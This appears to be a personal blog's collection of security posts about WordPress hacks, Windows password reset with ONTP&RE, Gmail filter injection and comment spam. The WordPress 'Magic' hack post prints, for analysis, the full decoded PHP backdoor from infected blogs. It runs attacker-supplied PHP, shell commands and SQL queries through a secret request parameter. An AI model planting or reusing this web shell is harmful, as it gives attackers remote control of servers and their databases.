My WordPress Blog was Hacked

One of my wordpress blogs was hacked. Here is how you can avoid this:

1. Do not load plugins you do no need
2. Check New Plugin before you install
3. Update WordPress and plugins often

To find the hacked plugins look at Date Time Stamps

found bfwp on my site group docs assembly was hacked
more on elamb.org, thunderstated.com

reset-password

Windows Password Recovery: ONTPRE

Offline NT Password & Registry Editor (ONTP&RE)

Did you lock yourself out of your Windows system?  Forgot your Windows password?  What is the best Windows password recovery?

The best way is to have a Windows Recovery disc ready.  But this is something you must do BEFORE you get locked out.

reset-password

reset-password

There are tools you can use to get into your system, but the first think you should try is to use “Administrator” as the user with no password.  “Administrator” is a default account on Windows systems.  On Windows 7 it is disabled by default but if someone has used the account you may be able to use it as backdoor into the system.

If their is not Administrator account and no Windows Recovery disc you will have to use a Windows password recovery tool.  ONTP&RE is a password recovery tool that allows quick access to windows systems.

Reset Password : Windows 7

1.  Download ONTP&E: First, download the Windows password recovery software from pogostick.net . pogostick.net/~pnh/ntpasswd/cd110511.zip

2.  Unzip ONTP&E:  Files are compressed into 1 folder named ( cd110511.zip).  Unzip the file.

3.  Create CD with ISO:  Set the cd disc creator into ‘image to  disc’’. Burn the image to the cd.  Each CD burner software is different, so you will have to figure out how to create a CD from the ISO.  Sometimes its as easy as double clicking the ISO but it depends on the type of software.

4.  Reboot & Insert:  Actually, you need to make sure your Windows system is able to boot from the CD.  Once its done , insert the cd back to the CD ROM  and reboot your computer.

5.   Computer Boot from CD:  As your computer reboots, keep hitting F2 to go through the BIOS.  Select “Boot Options”.  Some versions of BIOS call this “Boot”.  But the idea is the same.  Go into the BIOS and make sure CDROM is on the top of the list for boot options.  This means that the computer first looks at the CD before going to the Hard Drive.  Instructions on modifying BIOS settings will be listed on the page.

6.  Boot into ONTRE:  Once the BIOS boot option is set, save and exit.  Your system will boot into your ONTRE disc.  Software will start running. Just follow the steps.  “Press enter” to boot into the “Offline NT Password & Registry Editor” CD.

windows password recovery

screen shot of Offline NT Password & Registry Editor

7.  Select an Account:  It will ask you to select an account.  If you hit “Enter” it will automatically boot into the [Administrator] account.

*note: Anything in [brackets] is the default value, so if you hit “Enter” it will auto-magically choose that [bracket] value.. its a linux thing.. you wouldn’t understand.

If you choose the “Administrator” account, you may need to Enable the account since the built-in Administrator account is  disabled by default in certain versions of Windows.

8.  Enable Built-in Administrator Account:  The Windows account  needs to be enabled.  Select 4  and enter ‘to Unlock and enable user Account’.

windows ontpre menu enable

windows ontpre menu

9.  Clear (blank) User Password:  After selecting 4-Unlock and Enable user account, you will be sent back to the User Edit Menu. If you want to clear the Administrator password (if it has one) then hit enter or type Administrator and Select 1 and “Enter” – to clear the user password.

10.  Save Changes:  Once you have made all the changes you want (enabled the Administrator account & cleared any passwords), you are ready for the next step.  Hit  ‘!’ and enter.

Windows Password save changes

Windows ONTP&RE password save change

On the screen it asks ‘What to do’?  hit q to quit. You will see:

Step FOUR:  Writing back changes

“About to write file(s) back.  Do it ?’’

Hit   Y  and enter to save changes.

11.  Last Step:  Hit “Ctrl-Alt-Del” to reboot and eject the cd quickly.  This will allow the system to boot into Windows on the Hard drive.

You can now login as “Administrator” with NO password.

Once you are in as Administrator you can change passwords of any local accounts in Control Panel | Users.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists('______safeshell'))

{

function ______safeshell($komut) {

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";

}

elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

}

}

};

if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

die();

}

};

echo "\n\n";

die();

};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

Unable to create directory-parent directory writable? wordpress 2.7

I was having uploading images on one of my WordPress 2.7 & 2.8 blogs. It gave me the following error:
Unable to create directory /home/username/server/wp-content/uploads/20XX/MM/ Is it parent directory writable by the server?

After a long time searching I found this solution from http://www.cyriac.me

Step 1: Log into your admin panel

Step 2: Go to Settings>>Miscellaneous

You will see two options,

Store uploads in this folder
Full URL path to files
Most probably you will see

/home/.boogee/XXXXX/XXXXXXX/wp-content/uploads

in the first field.

Step 3: Edit that to just

wp-contents/uploads

Some people were suggesting that you solve the problem my making the folders permissions 777, meaning anyone can do anything to that particular folder. As a security guy, I knew this was a bad idea (and it also did work for me 🙂 ). I kept searching and ran into that solution.

Worked like a charm! thanks cyriac for putting solution on the blog.

More GMAIL Problems

This was news I could not ignore because I really, really like Gmail. These hacks are ridiculous. I hope that google is getting a handle on this. It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:

According to David Airey & gnucitizen.org:
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.
gnucitizen

As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.

You can see the whole story on our temporary blog makeuseof-temporary.blogspot.com/

I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.

Now the thing is the domain name domainsgames.org is protected by Moniker and they hide all the contact info for it.

Domain ID:D154519952-LROR
Domain Name:DOMAINSGAME.ORG
Created On:22-Oct-2008 07:35:56 UTC
Last Updated On:08-Nov-2008 12:11:53 UTC
Expiration Date:22-Oct-2009 07:35:56 UTC
Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:MONIKER1571241
.
.
.
.
Name Server:NS3.DOMAINSERVICE.COM
Name Server:NS2.DOMAINSERVICE.COM
Name Server:NS1.DOMAINSERVICE.COM
Name Server:NS4.DOMAINSERVICE.COM

More at Makeusof.com

The Google Fix

Analyzing 20,000 MySpace Passwords

In a day where browsers are coming out with anti-phising tactics, I can not believe how many people still fall for phising. It’s all over the news, and most email clients display warnings. So when I got an email from “Admin@MySpace.com” I kind of chuckled.

I have a friend who is constantly getting her MySpace account hacked.  There seem to be lots of security issues in MySpace.

read more | digg story

Why Subdomain Hosting is Bad

“A quick look at why offering non-reseller subdomain hosting is a bad idea and can expose your passwords to malicious hostees.”

I’m glad I stubbled across this. I was going to host on WordPress Mu, but now I think I’ll stick with Blogware until I can lock down WPMU. WordPress is a superior product (more intuitive, better SEO design ect) But WPMU is just too new. I don’t feel comfortable having a buch of customers on such a shake, new system. I will likely host my own set of blogs on it until all the major bugs are worked out.

read more | digg story

Dvorak's Blog Spam Fix

Dvorak gets no spam, now he gets no blog spam. 

But my spam problems have just begun:
I started getting nailed with casino, porn and commercial site spam.  They trackback promoting Disney Trips, penis enlargements or, my favorite, Texas Holdem.  I still get a few spam links about every few weeks or so.  And I'm currently getting and giving traffic to a casino site.. and I haven't figured out how that is happening.  I'm sure these bastards are usings some kind of software to locate vulnerable (anonymous accepting) blogs and nuke them.  I've had to terminate my anonymous comments and I'm thinking of shutting down my Trackbacks.  I also blocked a few repeat offenders.  For me, that is unfortunate because the interaction (free comments, links to and from relevant sites of many different oppinions) is the coolest thing about blogs.  Blog innocence has come and gone over night.

Appearently, Marc Perkel at ctyme.com has found a way to get rid of all spam providing you are using apache and on word press.

He does it with this code:

< location /blog/wp-comments-newpost.php >
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^.*dvorak.org/.*
RewriteRule ^.* http://www.ctyme.com/comment-spam.html
< /location >

read more | digg story

Comment Spammers Exploiting Open blogs

I've recently experienced an increase in spam traffic on my blog.
It started when I got about 20 comments in one day on one of my least
popular articles.  I could see that the porn spammer had dug deep
into my site and found a seemingly insignifigant article to place about
100 links.  I deleted them imediately and blocked the IP from
whince they came. 

The very next day I had fifteen more.  I delete those and blocked
that IP.  I've been forced to turn off my anonymous
comments.  One of my favorite things about blogs is that anyone
can say anything – they so refreshingly interactive that they create
these close relationships with readers. 

Unfortunately, casino, porn and pill spammers also see the power of
blogs.  They target blogs with anonymous comments and
trackbacks.  And they use thousands of hacked computers to act as
proxies so that even if you block their IP they've got plenty more ways
to get to you. 

I've blocked them and I'm still seeing traffic coming from their sites
which tells me that they have linked to my site and my visitors are
clicking into their site then coming back to me. 

Here is a list of Casino Spammers retreived from Netaloid.com

“Finding our Poker Spammer’s identifying links is easy. Just
visit one of his web pages by using one of the thousands of spam links
he left on your site. Like poker.terashells.com, for instance. Then
click on the links to the casino sites. You’ll see something like (or
identical to) this:”

http://www.pacificpoker.com/default.htm?sr=904970&flag=0002

http://www.partypoker.com/index20100.htm?wm=2445773

http://www.empirepoker.com/index.htm?wm=2170658

http://banner.casinolasvegas.com/cgi-bin/redir.cgi?id=N&member=onlinecas&profile=lv2m

http://www.888.com/default.htm?sr=611794&flag=0002

http://www.starluckcasino.com/slcasino/links/56296.html

http://www.aceclub.com/aceclub/links/1790.html

http://www.reefclubcasino.com/default.htm?sr=806320&flag=0002

For more on legally stopping Casino, Porn and other spammers visit:

http://www.thepetitionsite.com/takeaction/353566831?ltl=1124161500

http://www.theregister.co.uk/2005/01/31/link_spamer_interview/

1 2